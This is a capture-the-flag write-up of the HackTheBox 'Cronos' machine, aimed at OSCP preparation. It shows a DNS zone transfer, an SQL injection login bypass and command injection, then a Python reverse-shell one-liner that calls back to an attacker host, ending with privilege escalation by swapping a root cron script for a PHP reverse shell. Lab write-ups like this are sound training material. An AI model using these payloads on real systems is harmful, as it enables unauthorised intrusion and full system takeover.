Cronos - HackTheBox WriteUp

Hello, and welcome to my article about the Cronos machine in HTB.

This is the first article that I will be publishing on retired HTB machines for people who want to prepare for the OSCP. The full list of OSCP-like machines can be found here.

First, Let’s scan for ports with Nmap:
nmap -sC -A -p- 10.10.10.13
sC – Runs default script of nmap
-A – Runs an aggressive scan
-p- – Checking all ports

As we can see, we have three open ports:
SSH – 22
Domain – 53
Http – 80
Also, the machine runs Linux OS.

Let’s surf to the http server with port 80, and we’ll be on the default page of Apache:

Well, I tried to run Dirbuster to see if there are some interesting hidden directories there – Nothing.
When we see some default page, we can think outside the box that maybe we can add a domain to load all the official website.
After that we find a domain, we’ll put the domain name to /etc/hosts – this is a configuration file that allow us to put new DNS name in our machine.
Now, we need to find the right DNS name for the machine.
We’ll use nslookup, which helps us to find our goal.

We’ll put: server 10.10.10.13
After that the IP of the machine and we’ll get the domain name which is cronos.htb!

Now we add cronos.htb to /etc/hosts file and save.

Open firefox browser and type in the URL – cronos.htb:

So, we access the site successfully.
As usual, when we see a website, we run Dirbuster:

Unfortunately, its not find any useful directories and files.

Now let’s commit the ‘zone transfer’ attack. The command is:
host -l cronos.htb 10.10.10.13

We got a list of domains.
Now put:
www.cronos.htb and admin.cronos.htb

Let’s enter to an interesting domain which is admin.cronos.htb, we’ll be in the login page.

Tried to put some default credentials like:
admin/admin
admin / Cronos
I could not guess the password.
We can run Hydra or another brute force tool, but before that, check for SQL Injection.
First, I want to explain what is SQLi.

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application’s content or behavior.

Now that you understand what an SQLi attack is, let’s check some basic payloads to bypass the login page.
I tried this payload: admin’ OR ‘1’=’
We will enter a payload which will cause a split between the username and password and we will perform a query.

We bypassed the login page successfully!!
After we log in, we can see a tool called “Net Tool v0.1” that allows us to ping IPs for example:

We can try to exploit a vulnerablity called “Command Injection” Which allows us to execute commands in the host operating system using a vulnerability application.

There are several methods to carry out the attack.
I tried:
8.8.8.8 | ls

We have RCE!
Now, we’ll try to get a reverse shell using Python with this payload:
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“IP”,PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([“/bin/sh”,”-i”])’

Change the IP and port, open a listener and boom! reverseshell!

When I got a shell, I transfered an enumeration tool called “lse.sh”, open a python server and transfer the tool using ‘wget’ command.
Give an execute permission and run the script!
We can see that the script found an interesting crontab in the path:
/var/www/laravel/artisan – write in php programming language and runs as root.

What is crontab / cronjobs?
Crontab/CronJobs are software or scripts that users can coordinate to run at specific or fixed times.

Cron Jobs runs with the security level of their owner (the user who created them)

After I explained briefly what crontab is, let’s continue.
The script found in /var/www/laravel/artisan which probably we have permissions because we are www-data user.

So yes, we have full permissions!
As we noticed, the script runs as root user, we try to put php reverse shell of pentest-monkey.
How can we do that?
Copy all the content of php reverse shell in the next URL:
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

We’ll create in our Kali machine a script called “artisan” and paste the content of the payload; just change the IP and PORT.

Open the Python server again and transfer to the victim machine the script that we’ve just created.
First, we need to delete the original script from the victim machine and then transfer our script.

Open a listener and wait for communication.

That’s it! we got the root user!
What you need to do next is go to the text file “root.txt” and copy the string!

I hope you find this article useful!

Keep Posted with the Latest Research Articles